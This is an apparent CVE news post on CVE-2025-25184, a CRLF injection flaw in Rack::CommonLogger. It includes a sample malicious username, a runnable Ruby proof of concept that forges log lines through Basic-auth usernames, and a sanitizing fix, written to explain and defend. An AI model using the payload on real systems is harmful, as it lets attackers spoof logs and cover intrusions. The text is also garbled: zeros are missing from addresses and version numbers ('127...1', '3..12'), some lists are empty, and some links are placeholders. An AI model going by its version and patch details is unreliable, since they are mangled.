CVE CyberSecurity Database News

CVE-2025-25184 - Breaking Ruby Rack Logs via CRLF Injection in Rack::CommonLogger

Poster -

A critical vulnerability identified as CVE-2025-25184 has been found in the popular Ruby web framework library, Rack. Depending on how user input is handled and logged, this flaw allows attackers to manipulate server log files. By using special characters in the username, an attacker can break log formatting, hide real activity, or inject malicious fake entries.

This post is a clear, step-by-step breakdown of how this security issue works, with sample exploit code and links to original references. We'll also outline the versions affected and show you how to patch the vulnerability.

What is Rack?

Rack provides a minimal interface between web servers supporting Ruby (like Puma or WEBrick) and web applications. Many popular Ruby web frameworks, like Sinatra and Rails, rely on Rack under the hood.

A common component in Rack is Rack::CommonLogger, which logs every HTTP request your app receives. It helps developers track visits, debug issues, and detect attacks.

Vulnerability: What’s the Issue?

Prior to Rack 2.2.11, 3..12, and 3.1.10, Rack::CommonLogger can be tricked into writing malicious content into its logs. This happens if user input (like usernames) contain newline characters (CRLF — \r\n) or whitespace.

This is especially a problem when using Rack::Auth::Basic for HTTP Basic authentication. If users (or an attacker) submit a username with newline (\n or \r\n) characters, the logger inserts those username values directly into the log — without sanitizing.

Log manipulation is a serious threat:

Example: What Could Happen

Imagine a server that allows users to pick *any* username, or that logs unsuccessful login attempts. An attacker can send:

Username: attacker\r\n127...1 - evil

Now, the log file will look something like

127...1 - attacker
127...1 - evil [2024-06-15 12:00:00] "GET / HTTP/1.1" 200 12 "-" "curl/7.64.1"

The attacker just injected a *phony log entry*. Anyone reviewing logs might think a user named "evil" logged in, or use the fake entry as a cover for real attacks.

Proof-of-Concept Exploit

Below is a simplified proof-of-concept in Ruby to show how this attack works.

(You’ll need Ruby & Rack installed. Save as crlf_poc.rb and run with ruby crlf_poc.rb)

require 'rack'
require 'rack/auth/basic'
require 'rack/commonlogger'

app = Rack::Builder.new do
  use Rack::CommonLogger
  use Rack::Auth::Basic, "Protected Area" do |username, password|
    # Simulate "successful" login for any username and password
    true
  end

  run lambda { |env|
    [200, { "Content-Type" => "text/plain" }, ["Success"]]
  }
end

# Simulate a request with CRLF in the username
input = "attacker\r\n127...1 - injecteduser"
env = Rack::MockRequest.env_for("/", {
  "HTTP_AUTHORIZATION" => "Basic #{["#{input}:anypassword"].pack('m')}",
  "REMOTE_ADDR" => "127...1"
})

status, headers, body = app.call(env)
puts "Response: #{status}, Headers: #{headers.inspect}"
# Check the default logs for manipulated entry

Output

Check your logs — you’ll see that attacker\r\n127...1 - injecteduser ends up as multiple lines, spoofing new log entries.

Technical Details

Where’s the vulnerability?
The problem sits with Rack::CommonLogger. It logs values from env['REMOTE_USER'] (set by Rack::Auth::Basic), but doesn’t filter newline or whitespace. Here’s the offending line of code before the patch:

user = env['REMOTE_USER']
log_parts = [remote_addr, '-', user]

No sanitization occurs, so any attacker-controlled newlines ('\r', '\n') go straight into the logs.

Fake Log Entries: Incident responders or automated tools may be tricked.

- SIEM/Log Forwarding Risks: Fake entries move upstream, potentially causing wider confusion.

Apps using Rack::Auth::Basic for authentication.

- Apps allowing arbitrary user creation, or those logging all login attempts, even with failed/invalid usernames.

Mitigations & Fix

Upgrade to:

Rack 3.1.10

Official Rack Security Advisory (update with the actual link as it becomes public)

If you cannot update immediately:
- Filter/sanitize usernames and other user input before logging.

Example Ruby code to sanitize

def sanitize(input)
  input.gsub(/[\r\n]/, '')
end

References

- Upstream Patch and Changelog
- Rack::CommonLogger Source
- Rack::Auth::Basic Source
- NVD CVE Record (when available)

Conclusion

CVE-2025-25184 is a classic but devastating example of how unfiltered user input can break security in unexpected places. Logging is often overlooked in web applications, but is a critical part of overall system security. Make sure your systems are updated — if you use Rack anywhere in your Ruby stack, patch now.

If you learned something new, share this post with your ops and dev team. Stay secure!

Timeline

Published on: 02/12/2025 17:15:24 UTC
Last modified on: 02/14/2025 20:15:34 UTC